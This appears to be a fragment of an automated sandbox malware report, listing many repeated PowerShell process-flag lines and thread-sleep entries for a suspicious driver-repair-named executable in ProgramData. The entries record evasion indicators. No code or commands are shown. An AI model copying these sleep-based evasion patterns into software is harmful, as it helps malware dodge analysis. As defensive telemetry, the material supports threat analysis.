Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 1000Thread sleep time: -40000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 1544Thread sleep time: -240000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 5960Thread sleep time: -53000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 5080Thread sleep time: -8400000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 5076Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 364Thread sleep time: -3600000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 1484Thread sleep time: -120000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 5076Thread sleep time: -12000000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 364Thread sleep time: -2000000s >= -30000s
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe TID: 5076Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep count: 1773 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep count: 436 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5032Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep count: 1744 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep count: 1119 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2628Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep count: 2294 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep count: 1801 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4464Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep count: 1488 > 30
